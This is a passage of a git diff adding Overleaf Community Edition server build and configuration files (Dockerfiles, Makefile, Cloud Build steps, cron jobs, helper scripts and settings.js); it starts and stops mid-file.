LOGGER_METHODS) { ++ this[methodName] = (...args) => { ++ writeJson({ ++ type: 'logMessage', ++ id: this.id, ++ data: { loggerName, methodName, args } ++ }) ++ } ++ } ++ } ++} + const queue = (0, _queue.default)(({ + id, + data +@@ -190,6 +206,7 @@ const queue = (0, _queue.default)(({ + } + return options; + }, ++ getLogger: (name) => new Logger(id, name), + emitWarning: warning => { + writeJson({ + type: 'emitWarning', +@@ -211,6 +228,9 @@ const queue = (0, _queue.default)(({ + module._compile(code, filename); // eslint-disable-line no-underscore-dangle + return module.exports; + }, ++ addDependency: filename => { ++ buildDependencies.push(filename); ++ }, + addBuildDependency: filename => { + buildDependencies.push(filename); + }, diff --git a/server-ce/.editorconfig b/server-ce/.editorconfig new file mode 100644 index 0000000..9d08a1a --- /dev/null +++ b/server-ce/.editorconfig @@ -0,0 +1,9 @@ +root = true + +[*] +charset = utf-8 +indent_style = space +indent_size = 2 +end_of_line = lf +insert_final_newline = true +trim_trailing_whitespace = true diff --git a/server-ce/.eslintrc b/server-ce/.eslintrc new file mode 100644 index 0000000..fc58ef3 --- /dev/null +++ b/server-ce/.eslintrc @@ -0,0 +1,25 @@ +{ + "extends": [ + "eslint:recommended", + "standard", + "prettier" + ], + "plugins": [ + "unicorn" + ], + "parserOptions": { + "ecmaVersion": 2020 + }, + "env": { + "node": true + }, + "rules": { + // Do not allow importing of implicit dependencies. 
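+    // (i.e. every import must be declared as a dependency in the consuming package's own package.json)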
+ "import/no-extraneous-dependencies": "error", + "unicorn/prefer-node-protocol": "error" + }, + "overrides": [ + // Extra rules for Cypress tests + { "files": ["**/*.spec.ts"], "extends": ["plugin:cypress/recommended"] } + ] +} diff --git a/server-ce/Dockerfile b/server-ce/Dockerfile new file mode 100644 index 0000000..be2d652 --- /dev/null +++ b/server-ce/Dockerfile @@ -0,0 +1,143 @@ +# --------------------------------------------- +# Overleaf Community Edition (overleaf/overleaf) +# --------------------------------------------- + +ARG OVERLEAF_BASE_TAG=sharelatex/sharelatex-base:arm64 +FROM $OVERLEAF_BASE_TAG + +WORKDIR /overleaf + +# Add required source files +# ------------------------- +ADD server-ce/genScript.js /overleaf/genScript.js +ADD server-ce/services.js /overleaf/services.js +ADD package.json package-lock.json /overleaf/ +ADD libraries/ /overleaf/libraries/ +ADD services/ /overleaf/services/ + +# Add npm patches +# ----------------------- +ADD patches/ /overleaf/patches + +# Install npm dependencies and build webpack assets +# ------------------------ +RUN --mount=type=cache,target=/root/.cache \ + --mount=type=cache,target=/root/.npm \ + --mount=type=cache,target=/overleaf/services/web/node_modules/.cache,id=server-ce-webpack-cache \ + --mount=type=tmpfs,target=/tmp true \ +&& node genScript install | bash \ +&& node genScript compile | bash + +# Copy runit service startup scripts to its location +# -------------------------------------------------- +ADD server-ce/runit /etc/service + +# Copy runit global settings to its location +# ------------------------------------------ +ADD server-ce/config/env.sh /etc/overleaf/env.sh + +# Configure nginx +# --------------- +ADD server-ce/nginx/nginx.conf.template /etc/nginx/templates/nginx.conf.template +ADD server-ce/nginx/overleaf.conf /etc/nginx/sites-enabled/overleaf.conf +ADD server-ce/nginx/clsi-nginx.conf /etc/nginx/sites-enabled/clsi-nginx.conf + + +# Configure log rotation +# ---------------------- +ADD server-ce/logrotate/overleaf /etc/logrotate.d/overleaf +RUN chmod 644 /etc/logrotate.d/overleaf + +# Configure cron tasks +# ---------------------- +ADD server-ce/cron /overleaf/cron +ADD server-ce/config/crontab-history /etc/cron.d/crontab-history +RUN chmod 600 /etc/cron.d/crontab-history +ADD server-ce/config/crontab-deletion /etc/cron.d/crontab-deletion +RUN chmod 600 /etc/cron.d/crontab-deletion + +# Copy Phusion Image startup and shutdown scripts to their locations +# ------------------------------------------------------------------ +COPY server-ce/init_scripts/ /etc/my_init.d/ +COPY server-ce/init_preshutdown_scripts/ /etc/my_init.pre_shutdown.d/ + +# Copy app settings files +# ----------------------- +COPY server-ce/config/settings.js /etc/overleaf/settings.js + +# Copy history-v1 files +# ----------------------- +COPY server-ce/config/production.json /overleaf/services/history-v1/config/production.json +COPY server-ce/config/custom-environment-variables.json /overleaf/services/history-v1/config/custom-environment-variables.json + +# Copy grunt thin wrapper +# ----------------------- +ADD server-ce/bin/grunt /usr/local/bin/grunt +RUN chmod +x /usr/local/bin/grunt + +# Fix error with envsubst +# ----------------------- +RUN rm -rf /etc/apt/sources.list.d/ubuntu.sources +COPY server-ce/ubuntu.sources /etc/apt/sources.list.d/ubuntu.sources +RUN apt-get update \ +&& apt-get install -y \ + gettext-base + +# Install full texlive +RUN apt-get install -y texlive-full + +# Install pygments for minted +RUN apt-get install -y 
python3-pygments + +# Node doesn't run with this file present, so delete it +# ----------------------- +RUN find / -name 'crc32c.node' -type f -delete + + + +# Copy history helper scripts +# --------------------------- +ADD server-ce/bin/flush-history-queues /overleaf/bin/flush-history-queues +RUN chmod +x /overleaf/bin/flush-history-queues +ADD server-ce/bin/force-history-resyncs /overleaf/bin/force-history-resyncs +RUN chmod +x /overleaf/bin/force-history-resyncs + +# Copy Latexmkrc +# ----------------------- +COPY server-ce/config/latexmkrc /usr/local/share/latexmk/LatexMk + +# File that controls open|closed status of the site +# ------------------------------------------------- +ENV SITE_MAINTENANCE_FILE="/etc/overleaf/site_status" +RUN touch $SITE_MAINTENANCE_FILE + +# Set Environment Variables +# -------------------------------- +ENV OVERLEAF_CONFIG=/etc/overleaf/settings.js + +ENV WEB_API_USER="overleaf" +ENV ADMIN_PRIVILEGE_AVAILABLE="true" + +ENV OVERLEAF_APP_NAME="Overleaf Community Edition" + +ENV OPTIMISE_PDF="true" + +# Phusion Image timeouts before sending SIGKILL to processes +# ---------------------------------------------------------- +ENV KILL_PROCESS_TIMEOUT=55 +ENV KILL_ALL_PROCESSES_TIMEOUT=55 +ENV GRACEFUL_SHUTDOWN_DELAY_SECONDS=1 + +ENV NODE_ENV="production" +ENV LOG_LEVEL="info" + + +EXPOSE 80 + +ENTRYPOINT ["/sbin/my_init"] + +# Store the revision +# ------------------ +# This should be the last step to optimize docker image caching. +ARG MONOREPO_REVISION +RUN echo "monorepo-server-ce,$MONOREPO_REVISION" > /var/www/revisions.txt diff --git a/server-ce/Dockerfile-base b/server-ce/Dockerfile-base new file mode 100644 index 0000000..a7836ec --- /dev/null +++ b/server-ce/Dockerfile-base @@ -0,0 +1,91 @@ +# -------------------------------------------------- +# Overleaf Base Image (sharelatex/sharelatex-base) +# -------------------------------------------------- + +FROM phusion-baseimage:offline + +# Make sure the LuaTeX cache is writable +# ----------------------------------- +ENV TEXMFVAR=/var/lib/overleaf/tmp/texmf-var + +# Bump this date to ensure dependencies are updated +# ------------------------------------------ +ENV REBUILT_AFTER="2025-03-27" + +# Install dependencies +# -------------------- +RUN --mount=type=cache,target=/var/cache/apt,sharing=locked \ +# Technically, we are using potentially stale package-lists with the below line. +# Practically, apt refreshes the lists as needed and release builds run in fresh CI VMs without the cache. + --mount=type=cache,target=/var/lib/apt/lists,sharing=locked true \ +# Enable caching: https://docs.docker.com/reference/dockerfile/#example-cache-apt-packages +&& rm -f /etc/apt/apt.conf.d/docker-clean && echo 'Binary::apt::APT::Keep-Downloaded-Packages "true";' > /etc/apt/apt.conf.d/keep-cache \ +&& apt-get update \ +&& apt-get install -y \ + unattended-upgrades \ + build-essential wget net-tools unzip time imagemagick optipng strace nginx git python3 python-is-python3 zlib1g-dev libpcre3-dev gettext-base libwww-perl ca-certificates curl gnupg \ + qpdf texlive-base latexmk texlive-extra-utils \ +# upgrade base image; batch all the upgrades together rather than installing them one-by-one (which is slow!)
+&& unattended-upgrade --verbose --no-minimal-upgrade-steps \ +# install Node.js https://github.com/nodesource/distributions#nodejs +&& mkdir -p /etc/apt/keyrings \ +&& curl -fsSL https://deb.nodesource.com/gpgkey/nodesource-repo.gpg.key | gpg --dearmor -o /etc/apt/keyrings/nodesource.gpg \ +&& echo "deb [signed-by=/etc/apt/keyrings/nodesource.gpg] https://deb.nodesource.com/node_20.x nodistro main" | tee /etc/apt/sources.list.d/nodesource.list \ +&& apt-get update \ +&& apt-get install -y nodejs \ + \ +&& rm -rf \ +# We are adding a custom nginx config in the main Dockerfile. + /etc/nginx/nginx.conf \ + /etc/nginx/sites-enabled/default + +# Install TexLive +# --------------- +# CTAN mirrors occasionally fail, in that case install TexLive using a +# different server, for example https://ctan.crest.fr +# +# # docker build \ +# --build-arg TEXLIVE_MIRROR=https://ctan.crest.fr/tex-archive/systems/texlive/tlnet \ +# -f Dockerfile-base -t sharelatex/sharelatex-base . +# ARG TEXLIVE_MIRROR=https://mirror.ox.ac.uk/sites/ctan.org/systems/texlive/tlnet + +# RUN mkdir /install-tl-unx \ +# && wget --quiet https://tug.org/texlive/files/texlive.asc \ +# && gpg --import texlive.asc \ +# && rm texlive.asc \ +# && wget --quiet ${TEXLIVE_MIRROR}/install-tl-unx.tar.gz \ +# && wget --quiet ${TEXLIVE_MIRROR}/install-tl-unx.tar.gz.sha512 \ +# && wget --quiet ${TEXLIVE_MIRROR}/install-tl-unx.tar.gz.sha512.asc \ +# && gpg --verify install-tl-unx.tar.gz.sha512.asc \ +# && sha512sum -c install-tl-unx.tar.gz.sha512 \ +# && tar -xz -C /install-tl-unx --strip-components=1 -f install-tl-unx.tar.gz \ +# && rm install-tl-unx.tar.gz* \ +# && echo "tlpdbopt_autobackup 0" >> /install-tl-unx/texlive.profile \ +# && echo "tlpdbopt_install_docfiles 0" >> /install-tl-unx/texlive.profile \ +# && echo "tlpdbopt_install_srcfiles 0" >> /install-tl-unx/texlive.profile \ +# && echo "selected_scheme scheme-basic" >> /install-tl-unx/texlive.profile \ +# \ +# && /install-tl-unx/install-tl \ +# -profile /install-tl-unx/texlive.profile \ +# -repository ${TEXLIVE_MIRROR} \ +# \ +# && $(find /usr/local/texlive -name tlmgr) path add \ +# && tlmgr install --repository ${TEXLIVE_MIRROR} \ +# latexmk \ +# texcount \ +# synctex \ +# etoolbox \ +# xetex \ +# && tlmgr path add \ +# && rm -rf /install-tl-unx + + +# Set up overleaf user and home directory +# ----------------------------------------- +RUN adduser --system --group --home /overleaf --no-create-home overleaf && \ + mkdir -p /var/lib/overleaf && \ + chown www-data:www-data /var/lib/overleaf && \ + mkdir -p /var/log/overleaf && \ + chown www-data:www-data /var/log/overleaf && \ + mkdir -p /var/lib/overleaf/data/template_files && \ + chown www-data:www-data /var/lib/overleaf/data/template_files diff --git a/server-ce/Makefile b/server-ce/Makefile new file mode 100644 index 0000000..e90d77b --- /dev/null +++ b/server-ce/Makefile @@ -0,0 +1,60 @@ +# Makefile + +MONOREPO_ROOT := ../ +HERE=$(shell pwd) +export MONOREPO_REVISION := $(shell git rev-parse HEAD) +export BRANCH_NAME ?= $(shell git rev-parse --abbrev-ref HEAD) +export OVERLEAF_BASE_BRANCH ?= sharelatex/sharelatex-base:$(BRANCH_NAME) +export OVERLEAF_BASE_LATEST ?= sharelatex/sharelatex-base +export OVERLEAF_BASE_TAG ?= sharelatex/sharelatex-base:arm64 +export OVERLEAF_BRANCH ?= sharelatex/sharelatex:$(BRANCH_NAME) +export OVERLEAF_LATEST ?= sharelatex/sharelatex +export OVERLEAF_TAG ?= sharelatex/sharelatex:arm64 + +all: build-base build-community + +build-base: + cp .dockerignore $(MONOREPO_ROOT) + docker build \ + --build-arg 
BUILDKIT_INLINE_CACHE=1 \ + --progress=plain \ + --file Dockerfile-base \ + --tag $(OVERLEAF_BASE_TAG) \ + --tag $(OVERLEAF_BASE_BRANCH) \ + $(MONOREPO_ROOT) + + +build-community: + cp .dockerignore $(MONOREPO_ROOT) + docker build \ + --build-arg BUILDKIT_INLINE_CACHE=1 \ + --progress=plain \ + --build-arg OVERLEAF_BASE_TAG \ + --build-arg MONOREPO_REVISION \ + --file Dockerfile \ + --tag $(OVERLEAF_TAG) \ + --tag $(OVERLEAF_BRANCH) \ + $(MONOREPO_ROOT) + +SHELLCHECK_OPTS = \ + --shell=bash \ + --external-sources \ + --exclude=SC1091 +SHELLCHECK_COLOR := $(if $(CI),--color=never,--color) +SHELLCHECK_FILES := { git ls-files "*.sh" -z; git grep -Plz "\A\#\!.*bash"; } | sort -zu + +shellcheck: + @$(SHELLCHECK_FILES) | xargs -0 -r docker run --rm -v $(HERE):/mnt -w /mnt \ + koalaman/shellcheck:stable $(SHELLCHECK_OPTS) $(SHELLCHECK_COLOR) + +shellcheck_fix: + @$(SHELLCHECK_FILES) | while IFS= read -r -d '' file; do \ + diff=$$(docker run --rm -v $(HERE):/mnt -w /mnt koalaman/shellcheck:stable $(SHELLCHECK_OPTS) --format=diff "$$file" 2>/dev/null); \ + if [ -n "$$diff" ] && ! echo "$$diff" | patch -p1 >/dev/null 2>&1; then echo "\033[31m$$file\033[0m"; \ + elif [ -n "$$diff" ]; then echo "$$file"; \ + else echo "\033[2m$$file\033[0m"; fi \ + done + +.PHONY: all \ + build-base build-community \ + shellcheck shellcheck_fix diff --git a/server-ce/bin/flush-history-queues b/server-ce/bin/flush-history-queues new file mode 100755 index 0000000..b54bc55 --- /dev/null +++ b/server-ce/bin/flush-history-queues @@ -0,0 +1,8 @@ +#!/bin/bash + +set -euo pipefail + +source /etc/container_environment.sh +source /etc/overleaf/env.sh +cd /overleaf/services/project-history +node scripts/flush_all.js 100000 diff --git a/server-ce/bin/force-history-resyncs b/server-ce/bin/force-history-resyncs new file mode 100755 index 0000000..389c98a --- /dev/null +++ b/server-ce/bin/force-history-resyncs @@ -0,0 +1,8 @@ +#!/bin/bash + +set -euo pipefail + +source /etc/container_environment.sh +source /etc/overleaf/env.sh +cd /overleaf/services/project-history +node scripts/force_resync.js 1000 force diff --git a/server-ce/bin/grunt b/server-ce/bin/grunt new file mode 100755 index 0000000..462c68d --- /dev/null +++ b/server-ce/bin/grunt @@ -0,0 +1,36 @@ +#!/bin/bash +# Thin wrapper on old grunt tasks to ease migrating. + +set -e +set -x +TASK="$1" +shift 1 + +cd /overleaf/services/web + +case "$TASK" in + user:create-admin) + echo "The grunt command is deprecated, run the create-user script using node instead" + node modules/server-ce-scripts/scripts/create-user.mjs --admin "$@" + ;; + + user:delete) + echo "The grunt command is deprecated, run the delete-user script using node instead" + node modules/server-ce-scripts/scripts/delete-user.mjs "$@" + ;; + + check:mongo) + echo "The grunt command is deprecated, run the check-mongodb script using node instead" + node modules/server-ce-scripts/scripts/check-mongodb.mjs + ;; + + check:redis) + echo "The grunt command is deprecated, run the check-redis script using node instead" + node modules/server-ce-scripts/scripts/check-redis.mjs + ;; + + *) + echo "Unknown task $TASK" + exit 1 + ;; +esac diff --git a/server-ce/bin/rename-env-vars-5-0.sh b/server-ce/bin/rename-env-vars-5-0.sh new file mode 100755 index 0000000..292d698 --- /dev/null +++ b/server-ce/bin/rename-env-vars-5-0.sh @@ -0,0 +1,18 @@ +#!/bin/bash + +set -euo pipefail + +FILE=${1:-docker-compose.yml} +if [[ ! -f "$FILE" ]]; then + echo "Expected to find $FILE, are you in the wrong directory?" 
+ exit 2 +fi + +BACKUP_FILE="$FILE.$(date '+%Y.%m.%d-%H.%M.%S')" +echo "Creating backup file $BACKUP_FILE" +cp "$FILE" "$BACKUP_FILE" + +echo "Replacing 'SHARELATEX_' with 'OVERLEAF_' in $FILE" +sed -i "s/SHARELATEX_/OVERLEAF_/g" "$FILE" + +echo "Done." diff --git a/server-ce/bin/shared b/server-ce/bin/shared new file mode 120000 index 0000000..418b1bc --- /dev/null +++ b/server-ce/bin/shared @@ -0,0 +1 @@ +../../bin/shared/ \ No newline at end of file diff --git a/server-ce/cloudbuild.public.yaml b/server-ce/cloudbuild.public.yaml new file mode 100644 index 0000000..f682a17 --- /dev/null +++ b/server-ce/cloudbuild.public.yaml @@ -0,0 +1,77 @@ +--- + +steps: + - id: build_base + name: us-east1-docker.pkg.dev/overleaf-ops/ol-docker/cloud-builder + dir: server-ce + args: + - 'build-base' + - id: tag_main_latest_base + name: gcr.io/cloud-builders/docker + script: | + #!/usr/bin/env bash + set -e + if [ "${BRANCH_NAME}" == main ]; then + docker tag ${_IMAGE_BASE} ${_IMAGE_BASE_LATEST}; + docker push ${_IMAGE_BASE_LATEST}; + fi + automapSubstitutions: true + - id: prefetch_ce + name: gcr.io/cloud-builders/docker + script: | + #!/usr/bin/env bash + set +e # Ignore pull failures + docker pull ${_IMAGE_TAG_BRANCH} + docker pull ${_IMAGE_TAG_LATEST} + exit 0 + automapSubstitutions: true + waitFor: + - '-' + - id: build_community + name: us-east1-docker.pkg.dev/overleaf-ops/ol-docker/cloud-builder + dir: server-ce + args: + - build-community + waitFor: + # do not wait for prefetch_ce, docker buildx will pull it as needed + - build_base + - id: tag_main_latest + name: gcr.io/cloud-builders/docker + script: | + #!/usr/bin/env bash + set -e + if [ "${BRANCH_NAME}" == main ]; then + docker tag ${_IMAGE_TAG} ${_IMAGE_TAG_LATEST}; + docker push ${_IMAGE_TAG_LATEST}; + fi + automapSubstitutions: true + waitFor: + - build_community +timeout: 3600s +options: + machineType: E2_HIGHCPU_32 + env: + - 'BRANCH_NAME=${BRANCH_NAME}' + # docker build + - 'OVERLEAF_BASE_BRANCH=${_IMAGE_BASE_BRANCH}' + - 'OVERLEAF_BASE_LATEST=${_IMAGE_BASE_LATEST}' + - 'OVERLEAF_BASE_TAG=${_IMAGE_BASE}' + - 'OVERLEAF_BRANCH=${_IMAGE_TAG_BRANCH}' + - 'OVERLEAF_LATEST=${_IMAGE_TAG_LATEST}' + - 'OVERLEAF_TAG=${_IMAGE_TAG}' +images: + - '${_IMAGE_BASE}' + - '${_IMAGE_BASE_BRANCH}' + - '${_IMAGE_TAG}' + - '${_IMAGE_TAG_BRANCH}' +substitutions: + _IMAGE_BASE: 'us-east1-docker.pkg.dev/overleaf-ops/ol-docker/overleaf-base:${BRANCH_NAME}-${SHORT_SHA}_${BUILD_ID}' + _IMAGE_BASE_BRANCH: 'us-east1-docker.pkg.dev/overleaf-ops/ol-docker/overleaf-base:${BRANCH_NAME}' + _IMAGE_BASE_LATEST: 'us-east1-docker.pkg.dev/overleaf-ops/ol-docker/overleaf-base:latest' + _IMAGE_TAG_BRANCH: 'us-east1-docker.pkg.dev/overleaf-ops/ol-docker/overleaf:${BRANCH_NAME}' + _IMAGE_TAG_LATEST: 'us-east1-docker.pkg.dev/overleaf-ops/ol-docker/overleaf:latest' + _IMAGE_TAG: 'us-east1-docker.pkg.dev/overleaf-ops/ol-docker/overleaf:${BRANCH_NAME}-${SHORT_SHA}_${BUILD_ID}' +tags: + - 'overleaf-public' + - '${BRANCH_NAME}' + - '${SHORT_SHA}' diff --git a/server-ce/config/crontab-deletion b/server-ce/config/crontab-deletion new file mode 100644 index 0000000..91a780d --- /dev/null +++ b/server-ce/config/crontab-deletion @@ -0,0 +1,3 @@ +5 * * * * root /overleaf/cron/deactivate-projects.sh >> /var/log/overleaf/cron-deactivate-projects.log 2>&1 +15 * * * * root /overleaf/cron/delete-users.sh >> /var/log/overleaf/cron-delete-users.log 2>&1 +20 * * * * root /overleaf/cron/delete-projects.sh >> /var/log/overleaf/cron-delete-projects.log 2>&1 diff --git a/server-ce/config/crontab-history
b/server-ce/config/crontab-history new file mode 100644 index 0000000..cfa12f9 --- /dev/null +++ b/server-ce/config/crontab-history @@ -0,0 +1,3 @@ +*/20 * * * * root /overleaf/cron/project-history-periodic-flush.sh >> /var/log/overleaf/cron-project-history-periodic-flush.log 2>&1 +30 * * * * root /overleaf/cron/project-history-retry-soft.sh >> /var/log/overleaf/project-history-retry-soft.log 2>&1 +45 * * * * root /overleaf/cron/project-history-retry-hard.sh >> /var/log/overleaf/project-history-retry-hard.log 2>&1 diff --git a/server-ce/config/custom-environment-variables.json b/server-ce/config/custom-environment-variables.json new file mode 100644 index 0000000..f65f74a --- /dev/null +++ b/server-ce/config/custom-environment-variables.json @@ -0,0 +1,61 @@ +{ + "databaseUrl": "HISTORY_CONNECTION_STRING", + "databaseUrlReadOnly": "HISTORY_FOLLOWER_CONNECTION_STRING", + "herokuDatabaseUrl": "DATABASE_URL", + "databasePoolMin": "DATABASE_POOL_MIN", + "databasePoolMax": "DATABASE_POOL_MAX", + "persistor": { + "backend": "OVERLEAF_HISTORY_BACKEND", + "s3": { + "key": "OVERLEAF_HISTORY_S3_ACCESS_KEY_ID", + "secret": "OVERLEAF_HISTORY_S3_SECRET_ACCESS_KEY", + "maxRetries": "OVERLEAF_HISTORY_S3_MAX_RETRIES", + "endpoint": "OVERLEAF_HISTORY_S3_ENDPOINT", + "pathStyle": "OVERLEAF_HISTORY_S3_PATH_STYLE", + "region": "OVERLEAF_HISTORY_S3_REGION", + "httpOptions": { + "timeout": "OVERLEAF_HISTORY_S3_TIMEOUT" + } + } + }, + "blobStore": { + "globalBucket": "OVERLEAF_HISTORY_BLOBS_BUCKET", + "projectBucket": "OVERLEAF_HISTORY_PROJECT_BLOBS_BUCKET" + }, + "chunkStore": { + "historyStoreConcurrency": "HISTORY_STORE_CONCURRENCY", + "bucket": "OVERLEAF_HISTORY_CHUNKS_BUCKET" + }, + "zipStore": { + "bucket": "OVERLEAF_HISTORY_ZIPS_BUCKET", + "zipTimeoutMs": "ZIP_STORE_ZIP_TIMEOUT_MS" + }, + "mongo": { + "uri": "OVERLEAF_MONGO_URL" + }, + "basicHttpAuth": { + "password": "STAGING_PASSWORD", + "oldPassword": "BASIC_HTTP_AUTH_OLD_PASSWORD" + }, + "jwtAuth": { + "key": "OT_JWT_AUTH_KEY", + "oldKey": "OT_JWT_AUTH_OLD_KEY", + "algorithm": "OT_JWT_AUTH_ALG" + }, + "clusterWorkers": "CLUSTER_WORKERS", + "maxFileUploadSize": "MAX_FILE_UPLOAD_SIZE", + "httpsOnly": "HTTPS_ONLY", + "httpRequestTimeout": "OVERLEAF_HISTORY_V1_HTTP_REQUEST_TIMEOUT", + "redis": { + "history": { + "host": "OVERLEAF_REDIS_HOST", + "password": "OVERLEAF_REDIS_PASS", + "port": "OVERLEAF_REDIS_PORT" + }, + "lock": { + "host": "OVERLEAF_REDIS_HOST", + "password": "OVERLEAF_REDIS_PASS", + "port": "OVERLEAF_REDIS_PORT" + } + } +} diff --git a/server-ce/config/env.sh b/server-ce/config/env.sh new file mode 100644 index 0000000..b12ca24 --- /dev/null +++ b/server-ce/config/env.sh @@ -0,0 +1,13 @@ +export CHAT_HOST=127.0.0.1 +export CLSI_HOST=127.0.0.1 +export CONTACTS_HOST=127.0.0.1 +export DOCSTORE_HOST=127.0.0.1 +export DOCUMENT_UPDATER_HOST=127.0.0.1 +export DOCUPDATER_HOST=127.0.0.1 +export FILESTORE_HOST=127.0.0.1 +export HISTORY_V1_HOST=127.0.0.1 +export NOTIFICATIONS_HOST=127.0.0.1 +export PROJECT_HISTORY_HOST=127.0.0.1 +export REALTIME_HOST=127.0.0.1 +export WEB_HOST=127.0.0.1 +export WEB_API_HOST=127.0.0.1 diff --git a/server-ce/config/latexmkrc b/server-ce/config/latexmkrc new file mode 100644 index 0000000..5bdc87c --- /dev/null +++ b/server-ce/config/latexmkrc @@ -0,0 +1,3 @@ +# equivalent to -gt option. 
Used to prevent latexmk from skipping recompilation +# of output.log and output.pdf +$go_mode = 3; diff --git a/server-ce/config/production.json b/server-ce/config/production.json new file mode 100644 index 0000000..f902bea --- /dev/null +++ b/server-ce/config/production.json @@ -0,0 +1,24 @@ +{ + "persistor": { + "backend": "fs", + "useSubdirectories": true + }, + "basicHttpAuth": { + "password": "password" + }, + "useDeleteObjects": "false", + "jwtAuth": { + "algorithm": "HS256" + }, + "mongo": {}, + "blobStore": { + "globalBucket": "/var/lib/overleaf/data/history/overleaf-global-blobs", + "projectBucket": "/var/lib/overleaf/data/history/overleaf-project-blobs" + }, + "chunkStore": { + "bucket": "/var/lib/overleaf/data/history/overleaf-chunks" + }, + "zipStore": { + "bucket": "/var/lib/overleaf/data/history/overleaf-zips" + } +} diff --git a/server-ce/config/settings.js b/server-ce/config/settings.js new file mode 100644 index 0000000..0cf2c5a --- /dev/null +++ b/server-ce/config/settings.js @@ -0,0 +1,473 @@ +/* eslint-disable + camelcase, + no-cond-assign, + no-dupe-keys, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS205: Consider reworking code to avoid use of IIFEs + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let redisConfig, siteUrl +let e +const Path = require('path') + +// These credentials are used for authenticating api requests +// between services that may need to go over public channels +const httpAuthUser = process.env.WEB_API_USER +const httpAuthPass = process.env.WEB_API_PASSWORD +const httpAuthUsers = {} +if (httpAuthUser && httpAuthPass) { + httpAuthUsers[httpAuthUser] = httpAuthPass +} + +const parse = function (option) { + if (option != null) { + try { + const opt = JSON.parse(option) + return opt + } catch (err) { + throw new Error(`problem parsing ${option}, invalid JSON`) + } + } +} + +const parseIntOrFail = function (value) { + const parsedValue = parseInt(value, 10) + if (isNaN(parsedValue)) { + throw new Error(`'${value}' is an invalid integer`) + } + return parsedValue +} + +const DATA_DIR = '/var/lib/overleaf/data' +const TMP_DIR = '/var/lib/overleaf/tmp' + +const settings = { + clsi: { + optimiseInDocker: process.env.OPTIMISE_PDF === 'true', + }, + + brandPrefix: '', + + allowAnonymousReadAndWriteSharing: + process.env.OVERLEAF_ALLOW_ANONYMOUS_READ_AND_WRITE_SHARING === 'true', + + // Databases + // --------- + + // Overleaf Community Edition's main persistent data store is MongoDB (http://www.mongodb.org/) + // Documentation about the URL connection string format can be found at: + // + // http://docs.mongodb.org/manual/reference/connection-string/ + // + // The following works out of the box with Mongo's default settings: + mongo: { + url: process.env.OVERLEAF_MONGO_URL || 'mongodb://dockerhost/sharelatex', + }, + + // Redis is used in Overleaf Community Edition for high volume queries, like real-time + // editing, and session management. 
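+  // (For example, an external Redis instance might be configured with the hypothetical values
+  // OVERLEAF_REDIS_HOST=redis.example.com, OVERLEAF_REDIS_PORT=6379 and OVERLEAF_REDIS_PASS=s3cret.)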
+ // + // The following config will work with Redis's default settings: + redis: { + web: (redisConfig = { + host: process.env.OVERLEAF_REDIS_HOST || 'dockerhost', + port: process.env.OVERLEAF_REDIS_PORT || '6379', + password: process.env.OVERLEAF_REDIS_PASS || undefined, + key_schema: { + // document-updater + blockingKey({ doc_id }) { + return `Blocking:${doc_id}` + }, + docLines({ doc_id }) { + return `doclines:${doc_id}` + }, + docOps({ doc_id }) { + return `DocOps:${doc_id}` + }, + docVersion({ doc_id }) { + return `DocVersion:${doc_id}` + }, + docHash({ doc_id }) { + return `DocHash:${doc_id}` + }, + projectKey({ doc_id }) { + return `ProjectId:${doc_id}` + }, + docsInProject({ project_id }) { + return `DocsIn:${project_id}` + }, + ranges({ doc_id }) { + return `Ranges:${doc_id}` + }, + // document-updater:realtime + pendingUpdates({ doc_id }) { + return `PendingUpdates:${doc_id}` + }, + // document-updater:history + uncompressedHistoryOps({ doc_id }) { + return `UncompressedHistoryOps:${doc_id}` + }, + docsWithHistoryOps({ project_id }) { + return `DocsWithHistoryOps:${project_id}` + }, + // document-updater:lock + blockingKey({ doc_id }) { + return `Blocking:${doc_id}` + }, + // realtime + clientsInProject({ project_id }) { + return `clients_in_project:${project_id}` + }, + connectedUser({ project_id, client_id }) { + return `connected_user:${project_id}:${client_id}` + }, + }, + }), + fairy: redisConfig, + // document-updater + realtime: redisConfig, + documentupdater: redisConfig, + lock: redisConfig, + history: redisConfig, + websessions: redisConfig, + api: redisConfig, + pubsub: redisConfig, + project_history: redisConfig, + + project_history_migration: { + host: redisConfig.host, + port: redisConfig.port, + password: redisConfig.password, + maxRetriesPerRequest: parseInt( + process.env.REDIS_MAX_RETRIES_PER_REQUEST || '20' + ), + key_schema: { + projectHistoryOps({ projectId }) { + return `ProjectHistory:Ops:{${projectId}}` // NOTE: the extra braces are intentional + }, + }, + }, + }, + + // Local disk caching + // ------------------ + path: { + // If we ever need to write something to disk (e.g. incoming requests + // that need processing but may be too big for memory), then write + // them to disk here: + dumpFolder: Path.join(TMP_DIR, 'dumpFolder'), + // Where to write uploads before they are processed + uploadFolder: Path.join(TMP_DIR, 'uploads'), + // Where to write intermediate file for full project history migration + projectHistories: Path.join(TMP_DIR, 'projectHistories'), + // Where to write the project to disk before running LaTeX on it + compilesDir: Path.join(DATA_DIR, 'compiles'), + // Where to cache downloaded URLs for the CLSI + clsiCacheDir: Path.join(DATA_DIR, 'cache'), + // Where to write the output files to disk after running LaTeX + outputDir: Path.join(DATA_DIR, 'output'), + }, + + // Server Config + // ------------- + + // Where your instance of Overleaf Community Edition can be found publicly. This is used + // when emails are sent out and in generated links: + siteUrl: (siteUrl = process.env.OVERLEAF_SITE_URL || 'http://localhost'), + + // Status page URL as displayed on the maintenance/500 pages. 
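+  // (e.g. OVERLEAF_STATUS_PAGE_URL=status.example.com, a hypothetical value)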
+ statusPageUrl: process.env.OVERLEAF_STATUS_PAGE_URL, + + // The name used to describe your Overleaf Community Edition installation + appName: process.env.OVERLEAF_APP_NAME || 'Overleaf Community Edition', + + restrictInvitesToExistingAccounts: + process.env.OVERLEAF_RESTRICT_INVITES_TO_EXISTING_ACCOUNTS === 'true', + + nav: { + title: + process.env.OVERLEAF_NAV_TITLE || + process.env.OVERLEAF_APP_NAME || + 'Overleaf Community Edition', + }, + + // The email address which users will be directed to as the main point of + // contact for this installation of Overleaf Community Edition. + adminEmail: process.env.OVERLEAF_ADMIN_EMAIL || 'placeholder@example.com', + + // If provided, a sessionSecret is used to sign cookies so that they cannot be + // spoofed. This is recommended. + security: { + sessionSecret: + process.env.OVERLEAF_SESSION_SECRET || process.env.CRYPTO_RANDOM, + }, + + csp: { + enabled: process.env.OVERLEAF_CSP_ENABLED !== 'false', + }, + + rateLimit: { + 